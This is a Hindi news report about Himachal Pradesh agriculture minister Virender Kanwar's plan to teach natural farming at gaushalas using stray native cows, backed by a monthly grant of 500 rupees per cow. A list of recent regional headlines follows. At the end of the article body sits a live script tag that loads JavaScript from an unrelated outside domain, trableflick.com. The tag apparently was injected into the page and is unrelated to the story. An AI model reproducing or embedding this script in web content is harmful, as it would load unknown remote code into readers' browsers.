Categories: हिमाचल

बेसहारा देसी गाय के माध्यम से गौशालाओं में सिखाई जाएगी प्राकृतिक खेतीः कंवर

<p>ग्रामीण विकास, पंचायती राज और कृषि मंत्री वीरेंद्र कंवर ने कहा है कि राज्य के प्रत्येक विकास खंड में एक गौशाला में बेसहारा देसी गाय को रखा जाएगा। इसके माध्यम से किसानों को प्राकृतिक खेती सिखाई जाएगी। कृषि मंत्री ने कहा कि देसी गाय प्राकृतिक खेती का आधार है और इन गौशालाओं में प्रशिक्षण मिलने से जहां किसान प्राकृतिक खेती को प्रोत्साहित होंगे, वहीं देसी गाय की अहमियत भी सामने आएगी। गौशाला संचालकों को बेसहारा गौवंश की देखभाल के लिए प्रोत्साहित किया जा रहा है। प्रदेश सरकार की ओर से प्रति माह 500 रुपए प्रति गाय की आर्थिक मदद प्रदान की जा रही है। उन्होंने कहा कि प्राकृतिक खेती सिखाने वाली गौशालाओं को अतिरिक्त प्रोत्साहन राशि देने पर भी विचार चल रहा है।</p>

<p>वीरेंद्र कंवर ने कहा कि गाय आधारित प्राकृतिक खेती न केवल किसानों को आर्थिक रूप से उभरने में मदद करेगी, बल्कि मानव के गिरते हुए स्वास्थ्य को भी ठीक करने में अहम भूमिका निभाएगी। उन्होंने कहा कि कीटनाशकों और रसायनिक उर्वरक के अत्यधिक प्रयोग से ऊपजाऊ भूमि बंजर होती रही है और हमारे खाद्यान्न भी विषैले हो रहे हैं। इन खाद्यान्नों को उपयोग करने वाले लोग नई-नई बीमारियों की चपेट में रहे हैं और लोगों को स्वास्थ्य प्रभावित हो रहा है। एक देसी गाय के पालने से किसान 30 एकड़ भूमि पर प्राकृतिक खेती कर सकता है। इससे न केवल इंसानों को रसायन मुक्त अनाज और सब्जियां मिलेगी बल्कि खाद और कीटनाशकों के रूप में खर्च होने वाले किसानों के हजारों रुपए भी बचेंगे। &nbsp;</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

बिझडी बाजार में कार और स्कूटी में टक्‍कर, मचा बवाल

  Hamirpur: उपमंडल बड़सर के बिझडी बाजार में उस समय अफरा तफरी का माहौल बन…

5 hours ago

Kangana Ranaut: सत्ता पाने के लिए देश के विभाजन से भी नहीं हिचकिचाते राहुल गांधी

  Mandi:खड्गे और जेपी नड्डा की पत्रवार के बीच मंडी से भाजपा सांसद और एक्‍ट्रेस…

5 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार को…

5 hours ago

राजनीति में घुला जहर, पीएम रखें पद की गरिमा: प्रियंका

  Shimla: शिमला में छुट्टियां बिता रहीं कांग्रेस की राष्ट्रीय महासचिव प्रियंका गांधी ने शुक्रवार…

5 hours ago

Uttar Pradesh: जमानत पर रिहा दुष्कर्म के आरोपी ने पीड़िता की गोली मारकर हत्या की

UP: दुष्कर्म का आरोपी और जमानत पर जेल से बाहर आए एक व्यक्ति ने दुष्कर्म…

6 hours ago

पेंशनरों की मांगों पर मुख्यमंत्री को ज्ञापन, सुधार की गुहार

  Nahan/Hamirpur: राज्‍य कार्यकारिणी के आह्वान पर अपनी मांगों को पेंशनरों ने जिला मुख्‍यालयों में…

6 hours ago